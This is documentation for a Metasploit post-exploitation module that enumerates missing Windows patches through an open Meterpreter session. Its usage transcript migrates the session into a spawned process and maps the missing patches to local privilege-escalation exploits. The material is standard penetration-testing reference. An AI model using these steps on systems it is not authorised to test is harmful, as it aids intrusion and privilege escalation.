h00die
2.2 KiB
2.2 KiB
Vulnerable Application
This module will attempt to enumerate which patches are applied to a
windows system based on the result of the WMI query: SELECT HotFixID FROM Win32_QuickFixEngineering.
Verification Steps
- Start msfconsole
- Get meterpreter session
- Do:
use post/windows/gather/enum_patches - Do:
set SESSION <session id> - Do:
run
Options
KB
A comma separated list of KB patches to search for. Default is: KB2871997, KB2928120
MSFLOCALS
Search for missing patches for which there is a MSF local module. Default is true.
SESSION
The session to run this module on.
Scenarios
Windows 7 (6.1 Build 7601, Service Pack 1).
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.10:49223) at 2019-12-14 08:37:46 -0700
msf > use post/windows/gather/enum_patches
msf post(windows/gather/enum_patches) > set SESSION 1
SESSION => 1
msf post(windows/gather/enum_patches) > run
[-] Known bug in WMI query, try migrating to another process
[*] Post module execution completed
msf post(windows/gather/enum_patches) > sessions 1
[*] Starting interaction with 1...
meterpreter > run post/windows/manage/migrate
[*] Running module against TEST-PC
[*] Current server process: Explorer.EXE (1908)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3992
[+] Successfully migrated to process 3992
meterpreter > background
[*] Backgrounding session 1...
msf post(windows/gather/enum_patches) > run
[+] KB2871997 is missing
[+] KB2928120 is missing
[+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86)
[+] KB2305420 - Possibly vulnerable to MS10-092 schelevator if Vista, 7, and 2008
[+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf if XP SP2/SP3 Win 2k3 SP2
[+] KB2778930 - Possibly vulnerable to MS13-005 hwnd_broadcast, elevates from Low to Medium integrity
[+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1
[+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1
[*] Post module execution completed